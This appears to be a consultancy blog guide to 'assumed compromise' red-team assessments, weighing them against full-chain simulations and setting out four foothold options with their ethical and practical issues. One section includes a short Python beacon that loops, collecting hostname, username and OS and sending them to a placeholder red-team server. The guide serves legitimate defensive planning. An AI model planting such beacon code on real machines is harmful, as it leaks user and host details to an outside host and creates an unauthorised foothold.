Gemma Moore 25 January, 2024

"Assumed Compromise" Assessments: A Guide

In red teaming, defining the business objectives early is essential to realising the best value from the exercise. Each attack simulation involves a bespoke scoping process, and it is during scoping that we discuss the different ways of achieving the desired business objectives and the pros and cons of each.  The best red teaming approach for you and your organisation will depend on several factors, including the maturity of your controls and your defence teams, the reason you are conducting the attack simulation, your wider business goals and your desired learning outcomes.

There is often a trade-off in red teaming between the 'realism' of a simulation in accurately emulating adversary tactics and other factors, such as budget and limiting risk to the target business.

It's often the case that, having analysed the objectives of the business and factored in budgetary constraints, we decide that the best way to approach an attack simulation is to assume that a user account or workstation has already been compromised by an adversary, and therefore to take an initial position within the network comparable to that of a standard user.

In an 'assumed compromise' simulation, we're answering: Assuming an adversary has already gained a foothold as a user in the network, what could they do?

Why might you avoid 'assumed compromise'?

There are several good reasons why you might want to avoid an 'assumed compromise' starting point for your simulation.  One of the biggest is ensuring that your attack simulation is as realistic as possible.

Where budget, time constraints and practical limitations allow, a full-chain attack simulation – covering all areas including reconnaissance, target identification, social engineering, delivery of malware and establishment of a persistent foothold – provides a business with robust evidence about how it would be likely to fare against a real attack from a determined and skilled adversary.  As well as helping to identify areas of weakness in technical and procedural controls, a full attack simulation allows a business to accurately benchmark the performance of detection and response teams and therefore to improve response capability.

A downside of using 'assumed compromise' starting points is that the resulting evidential artefacts – which may be examined by the detection and response teams once red team activities have been discovered – might not track all the way back to a 'realistic' initial point of compromise.  If you need your detection and response teams to be able to exercise their processes and procedures against the full chain of an attack, using an 'assumed compromise' exercise might hinder this.

If you have a business requirement to provide a realistic simulation of an attack – either to underpin a business case for investment and funding, or to validate the real-world effectiveness of controls across the whole organisation – choosing a full-chain attack simulation will be the way to go, assuming budget can stretch to it.

If your reason for conducting a simulation is to provide robust evidence of cyber security maturity to a regulator, or to meet compliance requirements, again a full simulation is likely to be more suitable.  In many cases, though, an 'assumed compromise' starting point can provide very valuable intelligence about resilience.

Why would you choose 'assumed compromise'?

If the majority of adversarial breaches start with some form of social engineering or phishing attack, why is a starting point that assumes a compromise even useful?  There are several reasons why 'assumed compromise' might be the way to go; here are some examples.

A primary case for 'assumed compromise' assessments is where there is a credible concern about the potential for insider threat actors to impact a business.  By definition, an insider threat has a starting position within the organisation – understanding what an adversary could accomplish with this level of access might be the core goal in that case.

Most organisations invest heavily in their perimeter controls.  These controls will usually include mature Endpoint Detection and Response (EDR) solutions deployed to their user workstations and laptops, as well as email filters and web traffic filters.  Since most external breaches tend to be the result of a user falling victim to a phishing attack delivering malware to an endpoint via email or a website, this is entirely logical.  The presence of such a strong control set, however, means that when running a simulation it can be very time-consuming to perform full reconnaissance against the different controls in place and construct a technical attack path that will result in the red team gaining a full foothold.  'Time-consuming', in the context of red teaming, generally equates to 'expensive'.

Similarly, if the red team need to create robust social engineering pretexts and convince users to open documents, click links or download software in order to gain their foothold, this can take a substantial amount of time – especially where users identify and report malicious activity, meaning that the red team need to 'burn' their current attack approach and create a new one.

Social engineering attacks against employees also pose wellbeing challenges that need to be managed when designing pretexts and approaches.  Humans are inherently susceptible to social engineering, and we can reliably hypothesise that where an organisation is specifically targeted by a determined adversary, that adversary will at some point be able to convince an employee to read a message, click a link or download a file to the attacker's advantage.  When we know this with high confidence, including proof of this part of the attack chain in the simulation might not be necessary.  In many cases, organisations already conduct independent phishing simulations to assess the susceptibility of their teams to social engineering, and the results of these can provide evidence for this.

If the goal for the business is to understand where there are gaps in perimeter coverage that would allow an adversary to introduce malware, open-box exercises such as holistic reviews of technical controls are likely to provide better coverage, and be delivered at lower cost, than a full-chain red team involving social engineering and phishing attacks.  Equally, where assessing the susceptibility of employees to social engineering is not a goal for the business, it might make sense to remove the social engineering part of the assessment, saving time and therefore budget.

If one of the primary goals for the business is to understand whether a breach in progress within the internal network can be detected and stopped in a timely manner, budgeted time may be better spent exercising against internal network systems rather than examining controls on the perimeter.  There are cases where internal detection and response teams are already well-practised at responding to intrusions that originate via phishing attacks, for example, and there is good confidence in the response team's ability to robustly handle these events.  In those cases, it's often useful to use 'assumed compromise' to answer the question, "assuming an adversary managed to breach the perimeter without us seeing it, would we be able to stop them later on in their attack?"

Isn't it "cheating"?

Yes and no.  

The results of an assumed compromise simulation might be challenged within an organisation, on the basis that the attack team have "cheated" by being granted an initial position in the environment as part of the simulation.  

Whilst, technically, it does give the attack team a shortcut to a foothold, the reality of today's threat environment is that security plans and decisions should be made on the assumption that a breach will occur.  

Even with the best patching regime and a well-hardened build, a workstation breach is only one novel evasion technique or zero-day vulnerability away.  Even with the best user awareness training, a user account compromise is only one lapse of attention away.  

In this context, introducing the attack team so that they can explore the later stages of the attack chain with the benefit of a provided foothold allows us to challenge aspects of detection and response which simply don't get as much practice as the earlier stages of an attack in progress.

What are the options for 'assumed compromise'?

In theory, exercising via an 'assumed compromise' sounds simple – provide the red team with a user account, and let them carry out their attack from that point.  In reality, there are many different options for providing a foothold for assumed compromise, and each of these has associated pros and cons.  

These are some of the most commonly discussed:

Option 1: Ask a user to run some malware on their workstation

An obvious route for an assumed compromise is to ask a user to deliberately download and run a piece of malware within their profile.  That piece of malware would then provide the red team with their foothold in the environment and emulate the access gained by an adversary who had socially-engineered that user.  

This is typically the most realistic way of establishing a facilitated foothold, but it is not without its challenges.

On the positive side:

  • This provides a foothold which is associated with a known, existing internal user account that is fully functional.
  • The foothold is reasonably representative of that which an adversary would gain were they successful with a social engineering attack against this user.
  • The foothold will provide a reasonably realistic set of artefacts or indicators for analysis by defenders once the breach is identified.

On the negative side:

  • Whilst, technically, the access gained in this type of assumed compromise is identical to that gained during a social engineering compromise, there is a moral distinction between the two.  
    • Where a user falls victim to social engineering, their introduction of the malware is inadvertent.  Where a user voluntarily provides access to the red team in this way, they are likely to be committing contractual and policy breaches which could result in serious consequences for them as an individual.  
    • Similarly, in asking the user to introduce malware to their user account, you are asking them to voluntarily expose their personal data to the red team.  

Ethically, the user needs to consent to this activity whilst fully understanding the potential consequences, and the control group needs to ensure that the user is properly protected from adverse reactions as a result.  I have discussed this in more detail elsewhere; the arrangements can become complicated, and many users would be understandably reluctant to participate.

If this route is to be explored, the following considerations are key:

  • A user needs to be identified to participate in the exercise.  The 'ideal' user for this tends to be a mid- to low-level employee who is not directly within the chain of command of any technology or security functions.  (There are exceptions to this rule where scenarios surrounding the compromise of a privileged account are to be explored.)
  • This user needs to be fully briefed on their role in the exercise, and the amount of access that they will be providing to the red team.  This briefing should include full disclosure about the amount of access to files, messages and data the red team will be provided as a result of the user performing the requested action.
  • The user needs to agree to the level of access being requested, and may also wish to establish rules of engagement for the use of their account.
  • The control group must ensure that the user has robust protection from adverse consequences as a result of their participation in this exercise – this generally means having sign-off from legal and HR stakeholders within the business which provides the user with permission to breach their contract terms and the policies they have agreed to.

Option 2: Create a user account for the red team to use with a standard build workstation or VDI access

Creating a dedicated user account for the red team to act as a starting point for the exercise can be a useful option to consider.

On the positive side:

  • A dedicated user account created for the purposes of the simulation will not have the complications that arise if you choose to use an existing user account: there are no considerations in respect of personal data, and no established inter-personal relationships that could be impacted or damaged were a real user's account nominated.
  • As the red team only have access to this account, there is robust accountability for any activities this account conducts – there is no potential for split responsibilities between a legitimate account owner and the red team for actions conducted.

On the negative side:

  • Precisely because the account is new and has no history in the organisation, the account will be less representative of the position that an adversary might gain from compromising a user account themselves.  The red team won't have access to files and documents in a home directory which might be useful, they won't have access to emails that might reveal information about internal processes and procedures, and they won't have a message history to build upon for lateral movement techniques such as internal phishing, for example.
  • A new account for a fictional worker can be difficult to create where robust Joiners, Movers and Leavers (JML) processes are in place – this might mean complicated subterfuge to create the account, or reading several new people into the simulation.
  • Depending on the size of the business, new accounts with names not known to responders might be subjected to extra scrutiny by response teams – unlike the activities of accounts belonging to familiar individuals.

If you need to create an account for the red team specifically to enable an operation, here are some things that you might need to consider:

  • What are the practical challenges with the JML processes which the control group will need to overcome? For example, what HR processes are involved in account creation?  Usually, onboarding teams within HR departments are the ones who will make the request to create accounts.  Sometimes, a member of these teams can be read into the operation, but often a control group will want to explore ways that this could be bypassed: Can a request to create an account and get hold of a user device be injected later on in the business process to bypass the usual onboarding checks, or are there contractor or third-party account types which are easier to have created?  Can a user device be sent to a remote location easily, or does it need to be collected in person?
  • For any new account created during an engagement, it's often helpful to establish the cover story behind the account.  What department is the account holder in, what is their job role and who are they 'reporting' to?  It's not unusual for one of these purpose-created accounts to have to undergo post-enrolment training as part of the onboarding process, and sometimes this also involves conversations with the helpdesk and supposed colleagues.  Understanding these processes helps things run smoothly.
  • What name is going to be associated with the account you create?  We would usually recommend that the account is created with a generic-sounding name which will not stand out amongst the user population.  We also recommend that the account is aligned with the gender of the red team member who will operate it – in case responders ever initiate a video or voice call with the account holder.  We don't recommend setting up these accounts with the real names of the members of our red team – responders can too easily research the names of individuals who are part of our teams, and discovering one can pollute the response by revealing that an incident is part of a controlled exercise.  Sometimes, using the real names of the red team might be unavoidable – for example, where a device or laptop will only be issued to the user with an in-person identity check.  What should absolutely be avoided is naming accounts "Pentest Account" or "Security Test Account"!
  • Finally, you need to consider the working environment of the team into which the new user will be placed.  If the team work very closely together, in person or with very regular communications, the introduction of a new user account within the team is likely to be noticed and reported in a way that could compromise the simulation before it has begun.

Where the red team have a dedicated account to 'play' with, they can simulate a realistic infection by delivering malware to themselves via the workstation – using email, web or messaging mechanisms.  This can help produce a realistic attack chain demonstration for defenders without involving the data of other individuals.
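To make this concrete, below is a minimal sketch in Python of the kind of benign 'marker' payload a red team might run under its dedicated account to emulate that initial execution step.  The endpoint URL and exercise identifier are hypothetical placeholders, and a real engagement would use the red team's own tooling under the agreed rules of engagement; the point is simply that beaconing basic host context generates realistic network and endpoint artefacts for defenders to find.

# Minimal sketch of a benign 'marker' payload for an assumed-compromise
# exercise.  The endpoint, exercise ID and interval below are illustrative
# placeholders agreed with the control group, not real infrastructure.
import getpass
import json
import platform
import socket
import time
import urllib.request

C2_URL = "https://redteam.example.com/beacon"  # hypothetical red-team-controlled endpoint
EXERCISE_ID = "EXERCISE-0000"                  # placeholder exercise identifier
BEACON_INTERVAL_SECONDS = 300

def beacon_once() -> None:
    # Collect only basic host context - enough to prove the foothold and to
    # generate realistic network and endpoint artefacts, nothing sensitive.
    payload = json.dumps({
        "exercise": EXERCISE_ID,
        "host": socket.gethostname(),
        "user": getpass.getuser(),
        "os": platform.platform(),
        "timestamp": int(time.time()),
    }).encode("utf-8")
    request = urllib.request.Request(
        C2_URL, data=payload, headers={"Content-Type": "application/json"}
    )
    urllib.request.urlopen(request, timeout=10)  # the 'beacon' itself

if __name__ == "__main__":
    while True:
        beacon_once()
        time.sleep(BEACON_INTERVAL_SECONDS)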

If you are well-prepared in advance, this type of 'victim' user account could be maintained under cover for a period of time before the simulation starts, so that it is not brand new if and when suspicious activity is detected within it.  (In practice, this kind of advance preparation very rarely happens.)

Option 3: Provide a connection to the internal network with a user account, but no workstation

Where issuing workstation access or a laptop is challenging because of the processes and procedures in place, you could consider providing the red team with a connection to an internal network using a device they control, together with a purpose-created user account with standard user rights.

On the positive side:

  • As above, the dedicated user account created for the purposes of the simulation will not have the complications that arise if you choose to use an existing user account.  
  • As above, since the red team only have access to this account, there is robust accountability for any activities this account conducts.
  • You can avoid any problems with processes surrounding workstation building and allocation.

On the negative side:

  • To issue a purpose-created account, you still need to contend with JML processes and account creation, with all the considerations listed above.
  • You have the same problems as with other newly-created accounts – the account has no history in the organisation, and is less representative of the position that an adversary might gain from compromising a user account themselves.
  • You need to establish a connection point for the red team into the network, and this might mean bypassing physical security controls in place within office locations, as well as agreeing and understanding remote connectivity mechanisms.
  • Because no standard-build workstation or VDI environment is involved, you can't assess the impact of workstation configurations on the potential attack pathways that an adversary might have.
  • For organisations operating in a zero-trust paradigm or cloud-native environment, it's likely that there simply is no concept of an internal network - and conditional access controls may mean that connection to important services without a registered device is not possible without enrolment of that device, which once again brings into play the complications associated with JML processes.

Option 4: Provide a connection to the internal network without a user account

Your final option, where user accounts simply can't be provided, is generally to allow the red team to connect directly to the network.

On the positive side:

  • This is generally the simplest option to arrange.

On the negative side:

  • Because there is no user account involvement, the starting position for the red team is the least representative of that which an adversary is likely to have once they phish a user for access.
  • You need to establish a connection point for the red team into the network, as above, which might involve bypassing security controls.
  • As above, because no standard-build workstation or VDI environment is involved, you can't assess the impact of workstation configurations on the potential attack pathways that an adversary might have.
  • As above, for organisations operating in a zero-trust paradigm or cloud-native environment, it's likely that there simply is no concept of an internal network.

Takeaways

Red teaming is highly flexible.  Whatever your desired business outcomes and learning objectives, there is likely an adversary simulation exercise that can be crafted to your needs, your timescales, and your budget.  

When procuring an adversary simulation, carefully consider your desired learning outcomes and objectives – and where you want the most focus and effort to be.  Is the inclusion of social engineering and phishing going to provide value for money and deliver outcomes you will find valuable?  If yes – then carry on!

If you're not sure whether the return on a full-chain attack will be worth the investment, or if you're concerned about the ability to detect and respond to a breach which has already penetrated your first line of defence, it's certainly worth exploring assumed compromise as a starting point.  This is especially true if you are not so invested in being able to provide a fully realistic end-to-end attack story for stakeholders.
